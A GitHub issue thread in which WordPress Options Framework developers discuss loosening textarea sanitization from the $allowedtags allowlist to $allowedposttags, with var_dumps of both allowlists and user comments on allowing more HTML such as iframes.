Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with HTTPS or Subversion.

Download ZIP

Loading…

Replace $allowedtags with $allowedposttags for textarea #61

Closed
devinsays opened this Issue · 9 comments

6 participants

Devin Price Ryan Olson Kathy Thinkmojo mayurdotca dfrosso
Devin Price
Owner

The most asked question I get about the framework is how to allow more tags in the textarea. I'm thinking loosening the sanitization here to use $allowedposttags rather than $allowedtags. I'm also considering doing the same for the info tag. Discuss...

Here's a var dump with the differences:

ALLOWED TAGS:

array(13) { ["a"]=> array(2) { ["href"]=> array(0) { } ["title"]=> array(0) { } } ["abbr"]=> array(1) { ["title"]=> array(0) { } } ["acronym"]=> array(1) { ["title"]=> array(0) { } } ["b"]=> array(0) { } ["blockquote"]=> array(1) { ["cite"]=> array(0) { } } ["cite"]=> array(0) { } ["code"]=> array(0) { } ["del"]=> array(1) { ["datetime"]=> array(0) { } } ["em"]=> array(0) { } ["i"]=> array(0) { } ["q"]=> array(1) { ["cite"]=> array(0) { } } ["strike"]=> array(0) { } ["strong"]=> array(0) { } }

ALLOWED POST TAGS:

array(71) { ["address"]=> array(0) { } ["a"]=> array(8) { ["class"]=> array(0) { } ["href"]=> array(0) { } ["id"]=> array(0) { } ["title"]=> array(0) { } ["rel"]=> array(0) { } ["rev"]=> array(0) { } ["name"]=> array(0) { } ["target"]=> array(0) { } } ["abbr"]=> array(2) { ["class"]=> array(0) { } ["title"]=> array(0) { } } ["acronym"]=> array(1) { ["title"]=> array(0) { } } ["article"]=> array(6) { ["align"]=> array(0) { } ["class"]=> array(0) { } ["dir"]=> array(0) { } ["lang"]=> array(0) { } ["style"]=> array(0) { } ["xml:lang"]=> array(0) { } } ["aside"]=> array(6) { ["align"]=> array(0) { } ["class"]=> array(0) { } ["dir"]=> array(0) { } ["lang"]=> array(0) { } ["style"]=> array(0) { } ["xml:lang"]=> array(0) { } } ["b"]=> array(0) { } ["big"]=> array(0) { } ["blockquote"]=> array(5) { ["id"]=> array(0) { } ["cite"]=> array(0) { } ["class"]=> array(0) { } ["lang"]=> array(0) { } ["xml:lang"]=> array(0) { } } ["br"]=> array(1) { ["class"]=> array(0) { } } ["button"]=> array(4) { ["disabled"]=> array(0) { } ["name"]=> array(0) { } ["type"]=> array(0) { } ["value"]=> array(0) { } } ["caption"]=> array(2) { ["align"]=> array(0) { } ["class"]=> array(0) { } } ["cite"]=> array(4) { ["class"]=> array(0) { } ["dir"]=> array(0) { } ["lang"]=> array(0) { } ["title"]=> array(0) { } } ["code"]=> array(1) { ["style"]=> array(0) { } } ["col"]=> array(8) { ["align"]=> array(0) { } ["char"]=> array(0) { } ["charoff"]=> array(0) { } ["span"]=> array(0) { } ["dir"]=> array(0) { } ["style"]=> array(0) { } ["valign"]=> array(0) { } ["width"]=> array(0) { } } ["del"]=> array(1) { ["datetime"]=> array(0) { } } ["dd"]=> array(0) { } ["details"]=> array(7) { ["align"]=> array(0) { } ["class"]=> array(0) { } ["dir"]=> array(0) { } ["lang"]=> array(0) { } ["open"]=> array(0) { } ["style"]=> array(0) { } ["xml:lang"]=> array(0) { } } ["div"]=> array(6) { ["align"]=> array(0) { } ["class"]=> array(0) { } ["dir"]=> array(0) { } ["lang"]=> array(0) { } ["style"]=> array(0) { } ["xml:lang"]=> array(0) { } } ["dl"]=> array(0) { } ["dt"]=> array(0) { } ["em"]=> array(0) { } ["fieldset"]=> array(0) { } ["figure"]=> array(6) { ["align"]=> array(0) { } ["class"]=> array(0) { } ["dir"]=> array(0) { } ["lang"]=> array(0) { } ["style"]=> array(0) { } ["xml:lang"]=> array(0) { } } ["figcaption"]=> array(6) { ["align"]=> array(0) { } ["class"]=> array(0) { } ["dir"]=> array(0) { } ["lang"]=> array(0) { } ["style"]=> array(0) { } ["xml:lang"]=> array(0) { } } ["font"]=> array(3) { ["color"]=> array(0) { } ["face"]=> array(0) { } ["size"]=> array(0) { } } ["footer"]=> array(6) { ["align"]=> array(0) { } ["class"]=> array(0) { } ["dir"]=> array(0) { } ["lang"]=> array(0) { } ["style"]=> array(0) { } ["xml:lang"]=> array(0) { } } ["form"]=> array(7) { ["action"]=> array(0) { } ["accept"]=> array(0) { } ["accept-charset"]=> array(0) { } ["enctype"]=> array(0) { } ["method"]=> array(0) { } ["name"]=> array(0) { } ["target"]=> array(0) { } } ["h1"]=> array(4) { ["align"]=> array(0) { } ["class"]=> array(0) { } ["id"]=> array(0) { } ["style"]=> array(0) { } } ["h2"]=> array(4) { ["align"]=> array(0) { } ["class"]=> array(0) { } ["id"]=> array(0) { } ["style"]=> array(0) { } } ["h3"]=> array(4) { ["align"]=> array(0) { } ["class"]=> array(0) { } ["id"]=> array(0) { } ["style"]=> array(0) { } } ["h4"]=> array(4) { ["align"]=> array(0) { } ["class"]=> array(0) { } ["id"]=> array(0) { } ["style"]=> array(0) { } } ["h5"]=> array(4) { ["align"]=> array(0) { } ["class"]=> array(0) { } ["id"]=> array(0) { } ["style"]=> array(0) { } } ["h6"]=> array(4) { ["align"]=> array(0) { } ["class"]=> array(0) { } ["id"]=> array(0) { } ["style"]=> array(0) { } } ["header"]=> array(6) { ["align"]=> array(0) { } ["class"]=> array(0) { } ["dir"]=> array(0) { } ["lang"]=> array(0) { } ["style"]=> array(0) { } ["xml:lang"]=> array(0) { } } ["hgroup"]=> array(6) { ["align"]=> array(0) { } ["class"]=> array(0) { } ["dir"]=> array(0) { } ["lang"]=> array(0) { } ["style"]=> array(0) { } ["xml:lang"]=> array(0) { } } ["hr"]=> array(5) { ["align"]=> array(0) { } ["class"]=> array(0) { } ["noshade"]=> array(0) { } ["size"]=> array(0) { } ["width"]=> array(0) { } } ["i"]=> array(0) { } ["img"]=> array(11) { ["alt"]=> array(0) { } ["align"]=> array(0) { } ["border"]=> array(0) { } ["class"]=> array(0) { } ["height"]=> array(0) { } ["hspace"]=> array(0) { } ["longdesc"]=> array(0) { } ["vspace"]=> array(0) { } ["src"]=> array(0) { } ["style"]=> array(0) { } ["width"]=> array(0) { } } ["ins"]=> array(2) { ["datetime"]=> array(0) { } ["cite"]=> array(0) { } } ["kbd"]=> array(0) { } ["label"]=> array(1) { ["for"]=> array(0) { } } ["legend"]=> array(1) { ["align"]=> array(0) { } } ["li"]=> array(2) { ["align"]=> array(0) { } ["class"]=> array(0) { } } ["menu"]=> array(3) { ["class"]=> array(0) { } ["style"]=> array(0) { } ["type"]=> array(0) { } } ["nav"]=> array(6) { ["align"]=> array(0) { } ["class"]=> array(0) { } ["dir"]=> array(0) { } ["lang"]=> array(0) { } ["style"]=> array(0) { } ["xml:lang"]=> array(0) { } } ["p"]=> array(6) { ["class"]=> array(0) { } ["align"]=> array(0) { } ["dir"]=> array(0) { } ["lang"]=> array(0) { } ["style"]=> array(0) { } ["xml:lang"]=> array(0) { } } ["pre"]=> array(2) { ["style"]=> array(0) { } ["width"]=> array(0) { } } ["q"]=> array(1) { ["cite"]=> array(0) { } } ["s"]=> array(0) { } ["span"]=> array(7) { ["class"]=> array(0) { } ["dir"]=> array(0) { } ["align"]=> array(0) { } ["lang"]=> array(0) { } ["style"]=> array(0) { } ["title"]=> array(0) { } ["xml:lang"]=> array(0) { } } ["section"]=> array(6) { ["align"]=> array(0) { } ["class"]=> array(0) { } ["dir"]=> array(0) { } ["lang"]=> array(0) { } ["style"]=> array(0) { } ["xml:lang"]=> array(0) { } } ["strike"]=> array(0) { } ["strong"]=> array(0) { } ["sub"]=> array(0) { } ["summary"]=> array(6) { ["align"]=> array(0) { } ["class"]=> array(0) { } ["dir"]=> array(0) { } ["lang"]=> array(0) { } ["style"]=> array(0) { } ["xml:lang"]=> array(0) { } } ["sup"]=> array(0) { } ["table"]=> array(12) { ["align"]=> array(0) { } ["bgcolor"]=> array(0) { } ["border"]=> array(0) { } ["cellpadding"]=> array(0) { } ["cellspacing"]=> array(0) { } ["class"]=> array(0) { } ["dir"]=> array(0) { } ["id"]=> array(0) { } ["rules"]=> array(0) { } ["style"]=> array(0) { } ["summary"]=> array(0) { } ["width"]=> array(0) { } } ["tbody"]=> array(4) { ["align"]=> array(0) { } ["char"]=> array(0) { } ["charoff"]=> array(0) { } ["valign"]=> array(0) { } } ["td"]=> array(17) { ["abbr"]=> array(0) { } ["align"]=> array(0) { } ["axis"]=> array(0) { } ["bgcolor"]=> array(0) { } ["char"]=> array(0) { } ["charoff"]=> array(0) { } ["class"]=> array(0) { } ["colspan"]=> array(0) { } ["dir"]=> array(0) { } ["headers"]=> array(0) { } ["height"]=> array(0) { } ["nowrap"]=> array(0) { } ["rowspan"]=> array(0) { } ["scope"]=> array(0) { } ["style"]=> array(0) { } ["valign"]=> array(0) { } ["width"]=> array(0) { } } ["textarea"]=> array(5) { ["cols"]=> array(0) { } ["rows"]=> array(0) { } ["disabled"]=> array(0) { } ["name"]=> array(0) { } ["readonly"]=> array(0) { } } ["tfoot"]=> array(5) { ["align"]=> array(0) { } ["char"]=> array(0) { } ["class"]=> array(0) { } ["charoff"]=> array(0) { } ["valign"]=> array(0) { } } ["th"]=> array(15) { ["abbr"]=> array(0) { } ["align"]=> array(0) { } ["axis"]=> array(0) { } ["bgcolor"]=> array(0) { } ["char"]=> array(0) { } ["charoff"]=> array(0) { } ["class"]=> array(0) { } ["colspan"]=> array(0) { } ["headers"]=> array(0) { } ["height"]=> array(0) { } ["nowrap"]=> array(0) { } ["rowspan"]=> array(0) { } ["scope"]=> array(0) { } ["valign"]=> array(0) { } ["width"]=> array(0) { } } ["thead"]=> array(5) { ["align"]=> array(0) { } ["char"]=> array(0) { } ["charoff"]=> array(0) { } ["class"]=> array(0) { } ["valign"]=> array(0) { } } ["title"]=> array(0) { } ["tr"]=> array(7) { ["align"]=> array(0) { } ["bgcolor"]=> array(0) { } ["char"]=> array(0) { } ["charoff"]=> array(0) { } ["class"]=> array(0) { } ["style"]=> array(0) { } ["valign"]=> array(0) { } } ["tt"]=> array(0) { } ["u"]=> array(0) { } ["ul"]=> array(3) { ["class"]=> array(0) { } ["style"]=> array(0) { } ["type"]=> array(0) { } } ["ol"]=> array(4) { ["class"]=> array(0) { } ["start"]=> array(0) { } ["style"]=> array(0) { } ["type"]=> array(0) { } } ["var"]=> array(0) { } }

Ryan Olson

I rarely need to allow a ton of classes, so I usually just add to the $allowedtags array manually. Maybe an option for people to select what to add? Is that possible even?

Kathy

what about multiple types of textareas... or different flags that will trigger different levels of sanitization. it might be that i want to give my user a super strict textarea, but then also need to let them put scripts in another.

Thinkmojo

Agree with thatryan: " Maybe an option for people to select what to add? Is that possible even?" that'd be ideal I think.

Devin Price
Owner

The end user shouldn't be making those decisions, that would sort of defeat the purpose.

The developers do have a way to select which tags are allowed and not allowed through the filters. It can even get very granular down to the specific option if needed.

Perhaps this could be made even easier by having a: sanitization -> "custom_sanitization" option in the array but I'm not sure that is that much easier since you will still need to write the custom sanitization function.

But, back to the main issue I don't see a problem with creating "info" less strict since a developer would be editing that directly anyways.

I guess I'm asking if anyone thinks it will cause trouble to use $allowedposttags over $allowedtags in textarea? (Remember, it also still balances tags)

You could always apply a filter to make it more strict if needed.

mayurdotca

It would be great if we could allow HTML within the textarea. Can you tell me how I can test this on my installation? I think I'm supposed to edit line 11 of options-sanitize.php and change something??

Thanks Devin!

Devin Price
Owner

Yes, lines 10 and 11. allowedtags to allowedposttags.

dfrosso

Hi Devin. Great plugin, first of all. Is there a way to allow the "iframe" tag in textarea? This is for using the Google Maps code. Thanks.

Devin Price
Owner

@dfrosso Please read the examples I have in this post: http://wptheming.com/2011/05/options-framework-0-6/

Devin Price
Owner

I'm still getting a lot of requests, even after updating my documentation.

Made the change. If anyone notices any issues, please let me know. A new release still won't be for some time.

Devin Price devinsays closed this
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Something went wrong with that request. Please try again.